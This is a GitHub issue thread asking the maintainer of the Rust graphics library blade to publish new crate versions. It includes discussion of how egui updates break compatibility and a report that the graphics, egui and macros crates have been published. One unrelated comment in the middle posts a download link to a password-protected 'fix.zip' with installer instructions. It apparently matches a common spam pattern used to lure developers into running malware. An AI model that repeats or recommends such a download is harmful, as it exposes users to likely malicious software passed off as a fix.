### ISSUE TITLE
Publish new version

### ISSUE THREAD

**Issue by apekros** [kvark/blade#164]
Thanks for all your efforts, seeing as there have been a fair few changes i.e blade-egui updated to egui `0.28` since the last version was published, it would be awesome if you could publish a new version to crates.io, maybe some of the others crates have also had significant changes/fixes since the last version that could be published too?

**Comment by kvark** [comment]
Keeping the latest `egui` is one of the major compatibility breakers right now, unfortunately. I haven't figured out how to avoid this breakage. I expect `egui` to update more frequently than `blade`, so we'll find ourselves in a similar situation in the future...
I'll start working on the new version for crates.

**Comment by apekros** [comment]
> Keeping the latest `egui` is one of the major compatibility breakers right now, unfortunately. I haven't figured out how to avoid this breakage. I expect `egui` to update more frequently than `blade`, so we'll find ourselves in a similar situation in the future... I'll start working on the new version for crates.

Common patterns in other crates that is dependent on egui is unfortunately just to bump the crate that depends on egui, i.e blade-egui for each of the breaking egui releases

**Comment by kvark** [comment]
A while ago we have the same problem for math libraries and `winit`, and we ended up with `mint` and `raw-window-handle`, both of which turned out to be incredibly useful for the community. I wish something like this was possible for `egui`, but alas the architecture of the API doesn't make it easy so far.  We could also convince egui authors to at least do forward-declared types (aka the "semver hack") so that new egui versions can still be used with older clients, but that's isn't easy either.

**Comment by kvark** [comment]
ok, done with graphics/egui/macros. Let me know if anything is missing for you!
E.g. I didn't publish the asset/render/main sides yet. Not sure which parts of the stack you are relying on.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by apekros** [comment]
> A while ago we had the same problem for math libraries and `winit`, and we ended up with `mint` and `raw-window-handle`, both of which turned out to be incredibly useful for the community. I wish something like this was possible for `egui`, but alas the architecture of the API doesn't make it easy so far. We could also convince egui authors to at least do forward-declared types (aka the "semver hack") so that new egui versions can still be used with older clients, but that's isn't easy either.

This seems like a really neat solution but a lot of work on the authors to change

**Comment by apekros** [comment]
> ok, done with graphics/egui/macros. Let me know if anything is missing for you! E.g. I didn't publish the asset/render/main sides yet. Not sure which parts of the stack you are relying on.

This works perfectly for us, we're relying on graphics, render and egui but seems to be working fine without a bump on render(?) if there's some significant changes we'd benefit from would love to have that bumped too. Thanks so much!
